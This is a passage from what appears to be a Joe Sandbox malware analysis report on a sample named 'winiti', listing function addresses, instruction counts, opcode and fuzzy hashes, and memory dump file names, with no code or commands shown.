                  • Instruction ID: 92ab74a402f6fc0fe54e24a9512e35b2584dce09bdd3cc91efd91901d68f6e48
                  • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                  • Instruction Fuzzy Hash: D1F02220328049ABCB69EA188C51BAA33D5FBA4301F54C23AED49C7341D631DD408290
                  Function 00910101 Relevance: .0, Instructions: 31COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                  • Instruction ID: b72d56ecd92bc051f3f5d362174bb5d55932f667a636dabcb9a7a7f21a0a31e7
                  • Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                  • Instruction Fuzzy Hash: A5F05E72344209EFCB1CCF04C490BF937A6AB84719F24482CE50B8F690D77E98C1CA54
                  Function 008B00EA Relevance: .0, Instructions: 20COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7a8395c05aeaf2c8b7df5b4c6c9c27d7a63d5fc61cc1027a820f3627e4c38598
                  • Instruction ID: bb065d4aeafe013e4a3124ef794bc575a2e0fbc65f55d1769fe1965dbb76061a
                  • Opcode Fuzzy Hash: 7a8395c05aeaf2c8b7df5b4c6c9c27d7a63d5fc61cc1027a820f3627e4c38598
                  • Instruction Fuzzy Hash: 35E09A71544B80CFC310DF18D900B5AB3E8FF88B10F11483AF405C7751D7789A05C952
                  Function 008C00C4 Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                  • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                  • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                  • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                  Function 008C0048 Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                  • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                  • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                  • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                  Function 008C0060 Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                  • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                  • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                  • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                  Function 008C0078 Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                  • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                  • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                  • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                  Function 008C01D4 Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                  • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                  • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                  • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                  Function 008C010C Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                  • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                  • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                  • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                  Function 008C0C40 Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                  • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                  • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                  • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                  Function 008C10D0 Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                  • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                  • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                  • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                  Function 008C1148 Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                  • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                  • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                  • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                  Function 008BF8CC Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                  • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                  • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                  • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                  Function 008BF900 Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                  • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                  • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                  • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                  Function 008BF938 Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                  • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                  • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                  • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                  Function 008C1930 Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                  • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                  • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                  • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                  Function 008BFAB8 Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                  • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                  • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                  • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                  Function 008BFAD0 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                  • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                  • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                  • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                  Function 008BFA20 Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                  • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                  • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                  • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                  Function 008BFA50 Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
